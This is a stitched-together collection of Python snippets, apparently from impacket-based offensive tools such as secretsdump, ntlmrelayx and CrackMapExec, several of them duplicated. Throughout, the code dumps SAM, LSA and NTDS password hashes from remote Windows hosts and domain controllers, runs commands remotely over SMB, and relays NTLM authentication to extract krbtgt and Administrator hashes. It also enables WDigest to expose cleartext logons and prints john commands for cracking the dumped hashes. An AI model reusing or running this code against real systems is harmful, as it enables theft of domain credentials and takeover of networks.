def enable_remoteops(self):
try:
self.remote_ops = RemoteOperations(self.con, False, None)
self.remote_ops.enableRegistry()
self.bootkey = self.remote_ops.getBootKey()
except Exception as e:
self.logger.fail('RemoteOperations failed for {}: {}'.format(self.host, str(e)))
def enable_remoteops(self):
if self.remote_ops is not None and self.bootkey is not None:
return
try:
self.remote_ops = RemoteOperations(self.conn, False, None) #self.__doKerberos, self.__kdcHost
self.remote_ops.enableRegistry()
self.bootkey = self.remote_ops.getBootKey()
except Exception as e:
self.logger.error('RemoteOperations failed: {}'.format(e))
def enable_remoteops(self):
# Source: https://github.com/byt3bl33d3r/CrackMapExec/blob/master/cme/protocols/smb.py
if self.remote_ops is not None and self.bootkey is not None:
return
try:
self.remote_ops = RemoteOperations(self.con, False, None)
self.remote_ops.enableRegistry()
self.bootkey = self.remote_ops.getBootKey()
except Exception as e:
self.logger.fail('RemoteOperations failed for {}: {}'.format(
self.host, str(e)))
def run(self):
# Here PUT YOUR CODE!
if self.tcpshell is not None:
logging.info(
'Started interactive SMB client shell via TCP on 127.0.0.1:%d'
% self.tcpshell.port)
#Start listening and launch interactive shell
self.tcpshell.listen()
self.shell = MiniImpacketShell(self.__SMBConnection,
self.tcpshell.socketfile)
self.shell.cmdloop()
return
if self.config.exeFile is not None:
result = self.installService.install()
if result is True:
logging.info("Service Installed.. CONNECT!")
self.installService.uninstall()
else:
from impacket.examples.secretsdump import RemoteOperations, SAMHashes
samHashes = None
try:
# We have to add some flags just in case the original client did not
# Why? needed for avoiding INVALID_PARAMETER
flags1, flags2 = self.__SMBConnection.getSMBServer().get_flags(
)
flags2 |= smb.SMB.FLAGS2_LONG_NAMES
self.__SMBConnection.getSMBServer().set_flags(flags2=flags2)
remoteOps = RemoteOperations(self.__SMBConnection, False)
remoteOps.enableRegistry()
except Exception, e:
# Something wen't wrong, most probably we don't have access as admin. aborting
logging.error(str(e))
return
try:
if self.config.command is not None:
remoteOps._RemoteOperations__executeRemote(
self.config.command)
logging.info("Executed specified command on host: %s",
self.__SMBConnection.getRemoteHost())
self.__answerTMP = ''
self.__SMBConnection.getFile('ADMIN$', 'Temp\\__output',
self.__answer)
self.__SMBConnection.deleteFile('ADMIN$', 'Temp\\__output')
print self.__answerTMP.decode(self.config.encoding,
'replace')
else:
bootKey = remoteOps.getBootKey()
remoteOps._RemoteOperations__serviceDeleted = True
samFileName = remoteOps.saveSAM()
samHashes = SAMHashes(samFileName, bootKey, isRemote=True)
samHashes.dump()
samHashes.export(self.__SMBConnection.getRemoteHost() +
'_samhashes')
logging.info("Done dumping SAM hashes for host: %s",
self.__SMBConnection.getRemoteHost())
except Exception, e:
logging.error(str(e))
def getNTDSInfo(user, password, domain, ip):
print("[*] Trying to dump Domain users hashes...")
conn = SMBConnection(ip, ip, None, 445)
if conn.login(user, password, domain):
print("[+] Successful SMB connection to the DC")
r = RemoteOperations(conn, True)
r.enableRegistry()
bootkey = r.getBootKey()
print("[*] Creating and parsing NTDS...")
NTDSFileName = r.saveNTDS()
NTDS = NTDSHashes(NTDSFileName, bootkey, isRemote=True, history=False, noLMHash=False, remoteOps=r, useVSSMethod=True, resumeSession=None, printUserStatus=False, outputFileName='DOMAIN_HASHES')
print("[+] Success")
print("[*] Dumping hashes from NTDS (could take a while)...")
NTDS.dump()
NTDS.finish()
r.finish()
conn.close()
os.rename("DOMAIN_HASHES.ntds", "DOMAIN_HASHES.txt")
os.remove("DOMAIN_HASHES.ntds.kerberos")
if os.stat("DOMAIN_HASHES.ntds.cleartext").st_size == 0:
os.remove("DOMAIN_HASHES.ntds.cleartext")
else:
print("[+] Cleartext passwords founds ! look in the file DOMAIN_HASHES.ntds.cleartext")
print("[+] Successful dump of the users hashes in DOMAIN_HASHES.txt")
print("You can use 'john --format=NT DOMAIN_HASHES.txt' to crack passwords and 'john --format=NT --show DOMAIN_HASHES.txt | cut -d: -f 1,2 > JOHN_RESULT.txt' when you finished")
class DRSUAPIOps:
def __init__(self, target, username, password):
self.target = target
self.username = username
self.password = password
def run(self):
while True:
try:
self.__smbConnection = SMBConnection(remoteName=self.target,
remoteHost=self.target)
self.__smbConnection.login(self.username, self.password)
self.__remoteOps = RemoteOperations(self.__smbConnection,
False, None)
enumerationContext = 0
status = STATUS_MORE_ENTRIES
while status == STATUS_MORE_ENTRIES:
resp = self.__remoteOps.getDomainUsers(enumerationContext)
for user in resp['Buffer']['Buffer']:
userName = user['Name']
#print('userName : %s' % userName)
userSid = self.__remoteOps.ridToSid(user['RelativeId'])
crackedName = self.__remoteOps.DRSCrackNames(
drsuapi.DS_NAME_FORMAT.DS_SID_OR_SID_HISTORY_NAME,
drsuapi.DS_NAME_FORMAT.DS_UNIQUE_ID_NAME,
name=userSid.formatCanonical())
if crackedName['pmsgOut']['V1']['pResult'][
'cItems'] == 1:
if crackedName['pmsgOut']['V1']['pResult'][
'rItems'][0]['status'] != 0:
break
userRecord = self.__remoteOps.DRSGetNCChanges(
crackedName['pmsgOut']['V1']['pResult']
['rItems'][0]['pName'][:-1])
# userRecord.dump()
replyVersion = 'V%d' % userRecord['pdwOutVersion']
enumerationContext = resp['EnumerationContext']
status = resp['ErrorCode']
except Exception as e:
if str(e).find('STATUS_PIPE_NOT_AVAILABLE') != -1:
continue
elif str(e).find('STATUS_PIPE_CLOSING') != -1:
print('Server is restarting prolly now...')
return
raise e
def secretsdump(session):
session.lock.acquire()
logging.debug("secretsdump acquired session lock")
samHashes = None
try:
connection = SMBConnection(existingConnection=session)
flags1, flags2 = connection.getSMBServer().get_flags()
flags2 |= SMB.FLAGS2_LONG_NAMES
connection.getSMBServer().set_flags(flags2=flags2)
remoteOps = RemoteOperations(connection, False)
remoteOps.enableRegistry()
except Exception, e:
logging.error(str(e))
return
def wdigest_disable(self, context, smbconnection):
remoteOps = RemoteOperations(smbconnection, False)
remoteOps.enableRegistry()
if remoteOps._RemoteOperations__rrp:
ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
regHandle = ans['phKey']
ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest')
keyHandle = ans['phkResult']
try:
rrp.hBaseRegDeleteValue(remoteOps._RemoteOperations__rrp, keyHandle, 'UseLogonCredential\x00')
except:
context.log.success('UseLogonCredential registry key not present')
try:
remoteOps.finish()
except:
pass
return
try:
#Check to make sure the reg key is actually deleted
rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, 'UseLogonCredential\x00')
except DCERPCException:
context.log.success('UseLogonCredential registry key deleted successfully')
try:
remoteOps.finish()
except:
pass
def run(self):
# Here PUT YOUR CODE!
if self.tcpshell is not None:
LOG.info('Started interactive SMB client shell via TCP on 127.0.0.1:%d' % self.tcpshell.port)
#Start listening and launch interactive shell
self.tcpshell.listen()
self.shell = MiniImpacketShell(self.__SMBConnection,self.tcpshell.socketfile)
self.shell.cmdloop()
return
if self.config.exeFile is not None:
result = self.installService.install()
if result is True:
LOG.info("Service Installed.. CONNECT!")
self.installService.uninstall()
else:
from impacket.examples.secretsdump import RemoteOperations, SAMHashes
from impacket.examples.ntlmrelayx.utils.enum import EnumLocalAdmins
samHashes = None
try:
# We have to add some flags just in case the original client did not
# Why? needed for avoiding INVALID_PARAMETER
if self.__SMBConnection.getDialect() == smb.SMB_DIALECT:
flags1, flags2 = self.__SMBConnection.getSMBServer().get_flags()
flags2 |= smb.SMB.FLAGS2_LONG_NAMES
self.__SMBConnection.getSMBServer().set_flags(flags2=flags2)
remoteOps = RemoteOperations(self.__SMBConnection, False)
remoteOps.enableRegistry()
except Exception, e:
if "rpc_s_access_denied" in str(e): # user doesn't have correct privileges
if self.config.enumLocalAdmins:
LOG.info(u"Relayed user doesn't have admin on {}. Attempting to enumerate users who do...".format(self.__SMBConnection.getRemoteHost().encode(self.config.encoding)))
enumLocalAdmins = EnumLocalAdmins(self.__SMBConnection)
try:
localAdminSids, localAdminNames = enumLocalAdmins.getLocalAdmins()
LOG.info(u"Host {} has the following local admins (hint: try relaying one of them here...)".format(self.__SMBConnection.getRemoteHost().encode(self.config.encoding)))
for name in localAdminNames:
LOG.info(u"Host {} local admin member: {} ".format(self.__SMBConnection.getRemoteHost().encode(self.config.encoding), name))
except DCERPCException, e:
LOG.info("SAMR access denied")
return
# Something else went wrong. aborting
LOG.error(str(e))
return
def process_remote(username, password, target, historic):
hashes = list()
print("Attempting to connect to {}...".format(target))
try:
connection = SMBConnection(target, target)
connection.login(username, password, "", "", "")
ops = RemoteOperations(connection, False, None)
ops.setExecMethod("smbexec")
stopper = Event()
spinner = Thread(target=__update, args=(stopper, hashes))
spinner.start()
NTDSHashes(None,
None,
isRemote=True,
remoteOps=ops,
noLMHash=True,
useVSSMethod=False,
justNTLM=True,
printUserStatus=True,
history=historic,
lastLogon=True,
pwdLastSet=True,
perSecretCallback=lambda type, secret: hashes.append(
__process_hash(secret))).dump()
stopper.set()
spinner.join()
if len(hashes) == 0:
raise Exception(
"Extraction seemingly finished successfully but I didn't find any hashes..."
)
return __get_domain(hashes), hashes
except socket_error:
raise Exception("Failed to connect to {}".format(target))
except SessionError as e:
if e.error == 3221225581:
raise Exception(
"Username or password incorrect - please try again.")
def run(self):
if self.__enum is True:
self.connect()
self.__remoteOps = RemoteOperations(self.__smbConnection,
self.__doKerberos,
self.__kdcHost)
self.__remoteOps.connectSamr(self.__domain)
self.__keyListSecrets = KeyListSecrets(self.__domain,
self.__remoteName,
self.__rodc,
self.__aesKeyRodc,
self.__remoteOps)
logging.info(
'Enumerating target users. This may take a while on large domains'
)
if self.__full is True:
targetList = self.getAllDomainUsers()
else:
targetList = self.__keyListSecrets.getAllowedUsersToReplicate()
else:
logging.info('Using target users provided by parameter')
self.__keyListSecrets = KeyListSecrets(self.__domain,
self.__remoteName,
self.__rodc,
self.__aesKeyRodc, None)
targetList = self.__targets
logging.info('Dumping Domain Credentials (domain\\uid:[rid]:nthash)')
logging.info(
'Using the KERB-KEY-LIST request method. Tickets everywhere!')
for targetUser in targetList:
user = targetUser.split(":")[0]
targetUserName = Principal(
'%s' % user,
type=constants.PrincipalNameType.NT_PRINCIPAL.value)
partialTGT, sessionKey = self.__keyListSecrets.createPartialTGT(
targetUserName)
fullTGT = self.__keyListSecrets.getFullTGT(targetUserName,
partialTGT, sessionKey)
if fullTGT is not None:
key = self.__keyListSecrets.getKey(fullTGT, sessionKey)
print(self.__domain + "\\" + targetUser + ":" + key[2:])
def rdp_disable(self, context, smbconnection):
remoteOps = RemoteOperations(smbconnection, False)
remoteOps.enableRegistry()
if remoteOps._RemoteOperations__rrp:
ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
regHandle = ans['phKey']
ans = rrp.hBaseRegOpenKey(
remoteOps._RemoteOperations__rrp, regHandle,
'SYSTEM\\CurrentControlSet\\Control\\Terminal Server')
keyHandle = ans['phkResult']
rrp.hBaseRegSetValue(remoteOps._RemoteOperations__rrp, keyHandle,
'fDenyTSConnections\x00', rrp.REG_DWORD, 1)
rtype, data = rrp.hBaseRegQueryValue(
remoteOps._RemoteOperations__rrp, keyHandle,
'fDenyTSConnections\x00')
if int(data) == 1:
context.log.success('RDP disabled successfully')
try:
remoteOps.finish()
except:
pass
def wdigest_enable(self, context, smbconnection):
remoteOps = RemoteOperations(smbconnection, False)
remoteOps.enableRegistry()
if remoteOps._RemoteOperations__rrp:
ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
regHandle = ans['phKey']
ans = rrp.hBaseRegOpenKey(
remoteOps._RemoteOperations__rrp, regHandle,
'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest'
)
keyHandle = ans['phkResult']
rrp.hBaseRegSetValue(remoteOps._RemoteOperations__rrp, keyHandle,
'UseLogonCredential\x00', rrp.REG_DWORD, 1)
rtype, data = rrp.hBaseRegQueryValue(
remoteOps._RemoteOperations__rrp, keyHandle,
'UseLogonCredential\x00')
if int(data) == 1:
context.log.success(
'UseLogonCredential registry key created successfully')
try:
remoteOps.finish()
except:
pass
def wdigest_enable(self, context, smbconnection):
remoteOps = RemoteOperations(smbconnection, False)
remoteOps.enableRegistry()
if remoteOps._RemoteOperations__rrp:
ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
regHandle = ans['phKey']
ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest')
keyHandle = ans['phkResult']
rrp.hBaseRegSetValue(remoteOps._RemoteOperations__rrp, keyHandle, 'UseLogonCredential\x00', rrp.REG_DWORD, 1)
rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, 'UseLogonCredential\x00')
if int(data) == 1:
context.log.success('UseLogonCredential registry key created successfully')
try:
remoteOps.finish()
except:
pass
def run(self):
# Here PUT YOUR CODE!
if self.tcpshell is not None:
logging.info("Started interactive SMB client shell via TCP on 127.0.0.1:%d" % self.tcpshell.port)
# Start listening and launch interactive shell
self.tcpshell.listen()
self.shell = MiniImpacketShell(self.__SMBConnection, self.tcpshell.socketfile)
self.shell.cmdloop()
return
if self.config.exeFile is not None:
result = self.installService.install()
if result is True:
logging.info("Service Installed.. CONNECT!")
self.installService.uninstall()
else:
from impacket.examples.secretsdump import RemoteOperations, SAMHashes
samHashes = None
try:
# We have to add some flags just in case the original client did not
# Why? needed for avoiding INVALID_PARAMETER
flags1, flags2 = self.__SMBConnection.getSMBServer().get_flags()
flags2 |= smb.SMB.FLAGS2_LONG_NAMES
self.__SMBConnection.getSMBServer().set_flags(flags2=flags2)
remoteOps = RemoteOperations(self.__SMBConnection, False)
remoteOps.enableRegistry()
except Exception, e:
# Something wen't wrong, most probably we don't have access as admin. aborting
logging.error(str(e))
return
try:
if self.config.command is not None:
remoteOps._RemoteOperations__executeRemote(self.config.command)
logging.info("Executed specified command on host: %s", self.__SMBConnection.getRemoteHost())
self.__answerTMP = ""
self.__SMBConnection.getFile("ADMIN$", "Temp\\__output", self.__answer)
self.__SMBConnection.deleteFile("ADMIN$", "Temp\\__output")
else:
bootKey = remoteOps.getBootKey()
remoteOps._RemoteOperations__serviceDeleted = True
samFileName = remoteOps.saveSAM()
samHashes = SAMHashes(samFileName, bootKey, isRemote=True)
samHashes.dump()
samHashes.export(self.__SMBConnection.getRemoteHost() + "_samhashes")
logging.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost())
except Exception, e:
logging.error(str(e))
def wdigest_disable(self, context, smbconnection):
remoteOps = RemoteOperations(smbconnection, False)
remoteOps.enableRegistry()
if remoteOps._RemoteOperations__rrp:
ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
regHandle = ans['phKey']
ans = rrp.hBaseRegOpenKey(
remoteOps._RemoteOperations__rrp, regHandle,
'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest'
)
keyHandle = ans['phkResult']
try:
rrp.hBaseRegDeleteValue(remoteOps._RemoteOperations__rrp,
keyHandle, 'UseLogonCredential\x00')
except:
context.log.success(
'UseLogonCredential registry key not present')
try:
remoteOps.finish()
except:
pass
return
try:
#Check to make sure the reg key is actually deleted
rtype, data = rrp.hBaseRegQueryValue(
remoteOps._RemoteOperations__rrp, keyHandle,
'UseLogonCredential\x00')
except DCERPCException:
context.log.success(
'UseLogonCredential registry key deleted successfully')
try:
remoteOps.finish()
except:
pass
def on_admin_login(self, context, connection):
remoteOps = RemoteOperations(connection.conn, False)
remoteOps.enableRegistry()
ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
regHandle = ans['phKey']
ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System')
keyHandle = ans['phkResult']
dataType, uac_value = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, 'EnableLUA')
if uac_value == 1:
context.log.highlight('UAC Status: 1 (UAC Enabled)')
elif uac_value == 0:
context.log.highlight('UAC Status: 0 (UAC Disabled)')
rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
remoteOps.finish()
def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
if unpack('B', authenticateMessageBlob[:1]
)[0] == SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP:
respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob)
auth_data = respToken2['ResponseToken']
else:
auth_data = authenticateMessageBlob
remoteOps = None
try:
signingkey = self.netlogonSessionKey(serverChallenge,
authenticateMessageBlob)
# Something failed
if signingkey == 0:
return
self.session.set_session_key(signingkey)
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(auth_data)
# Recalc mic
authenticateMessage['MIC'] = b'\x00' * 16
if authenticateMessage['flags'] & NTLMSSP_NEGOTIATE_SEAL == 0:
authenticateMessage['flags'] |= NTLMSSP_NEGOTIATE_SEAL
newmic = ntlm.hmac_md5(
signingkey, self.negotiateMessage + self.challenge.getData() +
authenticateMessage.getData())
authenticateMessage['MIC'] = newmic
self.session.sendBindType3(authenticateMessage.getData())
# Now perform DRS bind
# This code comes from secretsdump directly
request = drsuapi.DRSBind()
request['puuidClientDsa'] = drsuapi.NTDSAPI_CLIENT_GUID
drs = drsuapi.DRS_EXTENSIONS_INT()
drs['cb'] = len(drs) #- 4
drs['dwFlags'] = drsuapi.DRS_EXT_GETCHGREQ_V6 | drsuapi.DRS_EXT_GETCHGREPLY_V6 | drsuapi.DRS_EXT_GETCHGREQ_V8 | \
drsuapi.DRS_EXT_STRONG_ENCRYPTION
drs['SiteObjGuid'] = drsuapi.NULLGUID
drs['Pid'] = 0
drs['dwReplEpoch'] = 0
drs['dwFlagsExt'] = 0
drs['ConfigObjGUID'] = drsuapi.NULLGUID
# I'm uber potential (c) Ben
drs['dwExtCaps'] = 0xffffffff
request['pextClient']['cb'] = len(drs)
request['pextClient']['rgb'] = list(drs.getData())
resp = self.session.request(request)
# Initialize remoteoperations
if self.serverConfig.smbuser != '':
smbConnection = SMBConnection(self.target.netloc,
self.target.netloc)
smbConnection.login(self.serverConfig.smbuser, self.serverConfig.smbpass, self.serverConfig.smbdomain, \
self.serverConfig.smblmhash, self.serverConfig.smbnthash)
remoteOps = RemoteOperations(smbConnection, False)
else:
remoteOps = PatchedRemoteOperations(None, False)
# DRSBind's DRS_EXTENSIONS_INT(). If not, it will fail later when trying to sync data.
drsExtensionsInt = drsuapi.DRS_EXTENSIONS_INT()
# If dwExtCaps is not included in the answer, let's just add it so we can unpack DRS_EXTENSIONS_INT right.
ppextServer = b''.join(resp['ppextServer']['rgb']) + b'\x00' * (
len(drsuapi.DRS_EXTENSIONS_INT()) - resp['ppextServer']['cb'])
drsExtensionsInt.fromString(ppextServer)
if drsExtensionsInt['dwReplEpoch'] != 0:
# Different epoch, we have to call DRSBind again
LOG.debug(
"DC's dwReplEpoch != 0, setting it to %d and calling DRSBind again"
% drsExtensionsInt['dwReplEpoch'])
drs['dwReplEpoch'] = drsExtensionsInt['dwReplEpoch']
request['pextClient']['cb'] = len(drs)
request['pextClient']['rgb'] = list(drs.getData())
resp = self.session.request(request)
remoteOps._RemoteOperations__hDrs = resp['phDrs']
domainName = authenticateMessage['domain_name'].decode('utf-16le')
# Now let's get the NtdsDsaObjectGuid UUID to use when querying NCChanges
resp = drsuapi.hDRSDomainControllerInfo(
self.session, remoteOps._RemoteOperations__hDrs, domainName, 2)
# LOG.debug('DRSDomainControllerInfo() answer')
# resp.dump()
if resp['pmsgOut']['V2']['cItems'] > 0:
remoteOps._RemoteOperations__NtdsDsaObjectGuid = resp[
'pmsgOut']['V2']['rItems'][0]['NtdsDsaObjectGuid']
else:
LOG.error("Couldn't get DC info for domain %s" % domainName)
raise Exception('Fatal, aborting')
remoteOps._RemoteOperations__drsr = self.session
# Initialize NTDSHashes object
if self.serverConfig.smbuser != '':
# We can dump all :)
nh = NTDSHashes(None,
None,
isRemote=True,
history=False,
noLMHash=False,
remoteOps=remoteOps,
useVSSMethod=False,
justNTLM=False,
pwdLastSet=False,
resumeSession=None,
outputFileName='hashes',
justUser=None,
printUserStatus=False)
nh.dump()
else:
# Most important, krbtgt
nh = NTDSHashes(None,
None,
isRemote=True,
history=False,
noLMHash=False,
remoteOps=remoteOps,
useVSSMethod=False,
justNTLM=False,
pwdLastSet=False,
resumeSession=None,
outputFileName='hashes',
justUser=domainName + '/krbtgt',
printUserStatus=False)
nh.dump()
# Also important, DC hash (to sync fully)
av_pairs = authenticateMessage['ntlm'][44:]
av_pairs = AV_PAIRS(av_pairs)
serverName = av_pairs[NTLMSSP_AV_HOSTNAME][1].decode(
'utf-16le')
nh = NTDSHashes(None,
None,
isRemote=True,
history=False,
noLMHash=False,
remoteOps=remoteOps,
useVSSMethod=False,
justNTLM=False,
pwdLastSet=False,
resumeSession=None,
outputFileName='hashes',
justUser=domainName + '/' + serverName + '$',
printUserStatus=False)
nh.dump()
# Finally, builtin\Administrator providing it was not renamed
try:
nh = NTDSHashes(None,
None,
isRemote=True,
history=False,
noLMHash=False,
remoteOps=remoteOps,
useVSSMethod=False,
justNTLM=False,
pwdLastSet=False,
resumeSession=None,
outputFileName='hashes',
justUser=domainName + '/Administrator',
printUserStatus=False)
nh.dump()
except Exception:
LOG.error('Could not dump administrator (renamed?)')
return None, STATUS_SUCCESS
except Exception as e:
traceback.print_exc()
finally:
if remoteOps is not None:
remoteOps.finish()
class DumpSecrets:
def __init__(self,
remoteName,
username='',
password='',
domain='',
options=None):
self.__useVSSMethod = options.use_vss
self.__remoteName = remoteName
self.__remoteHost = options.target_ip
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = options.aesKey
self.__smbConnection = None
self.__remoteOps = None
self.__SAMHashes = None
self.__NTDSHashes = None
self.__LSASecrets = None
self.__systemHive = options.system
self.__bootkey = options.bootkey
self.__securityHive = options.security
self.__samHive = options.sam
self.__ntdsFile = options.ntds
self.__history = options.history
self.__noLMHash = True
self.__isRemote = True
self.__outputFileName = options.outputfile
self.__doKerberos = options.k
self.__justDC = options.just_dc
self.__justDCNTLM = options.just_dc_ntlm
self.__justUser = options.just_dc_user
self.__pwdLastSet = options.pwd_last_set
self.__printUserStatus = options.user_status
self.__resumeFileName = options.resumefile
self.__canProcessSAMLSA = True
self.__kdcHost = options.dc_ip
self.__options = options
if options.hashes is not None:
self.__lmhash, self.__nthash = options.hashes.split(':')
def connect(self):
self.__smbConnection = SMBConnection(self.__remoteName,
self.__remoteHost)
if self.__doKerberos:
self.__smbConnection.kerberosLogin(self.__username,
self.__password, self.__domain,
self.__lmhash, self.__nthash,
self.__aesKey, self.__kdcHost)
else:
self.__smbConnection.login(self.__username, self.__password,
self.__domain, self.__lmhash,
self.__nthash)
def dump(self):
try:
if self.__remoteName.upper() == 'LOCAL' and self.__username == '':
self.__isRemote = False
self.__useVSSMethod = True
if self.__systemHive:
localOperations = LocalOperations(self.__systemHive)
bootKey = localOperations.getBootKey()
if self.__ntdsFile is not None:
# Let's grab target's configuration about LM Hashes storage
self.__noLMHash = localOperations.checkNoLMHashPolicy()
else:
import binascii
bootKey = binascii.unhexlify(self.__bootkey)
else:
self.__isRemote = True
bootKey = None
try:
try:
self.connect()
except Exception as e:
if os.getenv(
'KRB5CCNAME'
) is not None and self.__doKerberos is True:
# SMBConnection failed. That might be because there was no way to log into the
# target system. We just have a last resort. Hope we have tickets cached and that they
# will work
logging.debug(
'SMBConnection didn\'t work, hoping Kerberos will help (%s)'
% str(e))
pass
else:
raise
self.__remoteOps = RemoteOperations(
self.__smbConnection, self.__doKerberos,
self.__kdcHost)
self.__remoteOps.setExecMethod(self.__options.exec_method)
if self.__justDC is False and self.__justDCNTLM is False or self.__useVSSMethod is True:
self.__remoteOps.enableRegistry()
bootKey = self.__remoteOps.getBootKey()
# Let's check whether target system stores LM Hashes
self.__noLMHash = self.__remoteOps.checkNoLMHashPolicy(
)
except Exception as e:
self.__canProcessSAMLSA = False
if str(e).find('STATUS_USER_SESSION_DELETED') and os.getenv('KRB5CCNAME') is not None \
and self.__doKerberos is True:
# Giving some hints here when SPN target name validation is set to something different to Off
# This will prevent establishing SMB connections using TGS for SPNs different to cifs/
logging.error(
'Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user'
)
else:
logging.error('RemoteOperations failed: %s' % str(e))
# If RemoteOperations succeeded, then we can extract SAM and LSA
if self.__justDC is False and self.__justDCNTLM is False and self.__canProcessSAMLSA:
try:
if self.__isRemote is True:
SAMFileName = self.__remoteOps.saveSAM()
else:
SAMFileName = self.__samHive
self.__SAMHashes = SAMHashes(SAMFileName,
bootKey,
isRemote=self.__isRemote)
self.__SAMHashes.dump()
if self.__outputFileName is not None:
self.__SAMHashes.export(self.__outputFileName)
except Exception as e:
logging.error('SAM hashes extraction failed: %s' % str(e))
try:
if self.__isRemote is True:
SECURITYFileName = self.__remoteOps.saveSECURITY()
else:
SECURITYFileName = self.__securityHive
self.__LSASecrets = LSASecrets(SECURITYFileName,
bootKey,
self.__remoteOps,
isRemote=self.__isRemote,
history=self.__history)
self.__LSASecrets.dumpCachedHashes()
if self.__outputFileName is not None:
self.__LSASecrets.exportCached(self.__outputFileName)
self.__LSASecrets.dumpSecrets()
if self.__outputFileName is not None:
self.__LSASecrets.exportSecrets(self.__outputFileName)
except Exception as e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
logging.error('LSA hashes extraction failed: %s' % str(e))
# NTDS Extraction we can try regardless of RemoteOperations failing. It might still work
if self.__isRemote is True:
if self.__useVSSMethod and self.__remoteOps is not None:
NTDSFileName = self.__remoteOps.saveNTDS()
else:
NTDSFileName = None
else:
NTDSFileName = self.__ntdsFile
self.__NTDSHashes = NTDSHashes(
NTDSFileName,
bootKey,
isRemote=self.__isRemote,
history=self.__history,
noLMHash=self.__noLMHash,
remoteOps=self.__remoteOps,
useVSSMethod=self.__useVSSMethod,
justNTLM=self.__justDCNTLM,
pwdLastSet=self.__pwdLastSet,
resumeSession=self.__resumeFileName,
outputFileName=self.__outputFileName,
justUser=self.__justUser,
printUserStatus=self.__printUserStatus)
try:
self.__NTDSHashes.dump()
except Exception as e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
if str(e).find('ERROR_DS_DRA_BAD_DN') >= 0:
# We don't store the resume file if this error happened, since this error is related to lack
# of enough privileges to access DRSUAPI.
resumeFile = self.__NTDSHashes.getResumeSessionFile()
if resumeFile is not None:
os.unlink(resumeFile)
logging.error(e)
if self.__justUser and str(e).find(
"ERROR_DS_NAME_ERROR_NOT_UNIQUE") >= 0:
logging.info(
"You just got that error because there might be some duplicates of the same name. "
"Try specifying the domain name for the user as well. It is important to specify it "
"in the form of NetBIOS domain name/user (e.g. contoso/Administratror)."
)
elif self.__useVSSMethod is False:
logging.info(
'Something wen\'t wrong with the DRSUAPI approach. Try again with -use-vss parameter'
)
self.cleanup()
except (Exception, KeyboardInterrupt) as e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
logging.error(e)
if self.__NTDSHashes is not None:
if isinstance(e, KeyboardInterrupt):
while True:
answer = input("Delete resume session file? [y/N] ")
if answer.upper() == '':
answer = 'N'
break
elif answer.upper() == 'Y':
answer = 'Y'
break
elif answer.upper() == 'N':
answer = 'N'
break
if answer == 'Y':
resumeFile = self.__NTDSHashes.getResumeSessionFile()
if resumeFile is not None:
os.unlink(resumeFile)
try:
self.cleanup()
except:
pass
def cleanup(self):
logging.info('Cleaning up... ')
if self.__remoteOps:
self.__remoteOps.finish()
if self.__SAMHashes:
self.__SAMHashes.finish()
if self.__LSASecrets:
self.__LSASecrets.finish()
if self.__NTDSHashes:
self.__NTDSHashes.finish()
class SmbCon(Connector):
def __init__(self, args, loggers, host, db):
Connector.__init__(self, args, loggers, host)
self.auth = False
self.con = False
self.client = ''.join(
[choice(ascii_letters + digits) for x in range(7)])
self.smbv1 = False
self.os = ''
self.admin = False
self.signing = False
self.os_arch = '0'
self.remote_ops = None
self.bootkey = None
self.db = db
self.port = 445
#########################
# Session Management
#########################
def create_smb_con(self):
# Create SMB Con
if self.smb_connection():
self.host_info()
try:
# SMB Auth
self.con.login(self.username,
self.password,
self.domain,
lmhash=self.lmhash,
nthash=self.nthash)
self.auth = True
self.host_info()
self.isAdmin()
self.update_db()
except Exception as e:
raise Exception(str(e))
else:
raise Exception('Connection to Server Failed')
def update_db(self):
self.db.update_host(self.host, self.ip, self.domain, self.os,
self.signing)
if self.username and self.password or self.username and self.hash:
self.db.update_user(self.username, self.password, self.domain,
self.hash)
if self.admin:
self.db.update_admin(self.username, self.domain, self.host)
def logoff(self):
self.con.logoff()
def close(self):
try:
self.con.logoff()
except:
pass
try:
self.con.close()
except:
pass
#########################
# SMB Connection
#########################
def smb_connection(self):
if self.smbv1_con():
return True
elif self.smbv3_con():
return True
return False
def smbv1_con(self):
try:
self.con = SMBConnection(self.client,
self.host,
sess_port=self.port,
preferredDialect=SMB_DIALECT,
timeout=int(self.timeout))
self.smbv1 = True
self.con.setTimeout(self.timeout)
return True
except Exception as e:
return False
def smbv3_con(self):
try:
self.con = SMBConnection(self.client,
self.host,
sess_port=self.port,
timeout=int(self.timeout))
self.con.setTimeout(self.timeout)
return True
except Exception as e:
return False
#########################
# Authentication (NOT IN USE)
#########################
def set_host(self, local_auth):
# Get domain for authentication purposes
if local_auth:
self.domain = self.con.getServerName(
) + "." + self.con.getServerDNSDomainName()
else:
self.domain = self.con.getServerDNSDomainName()
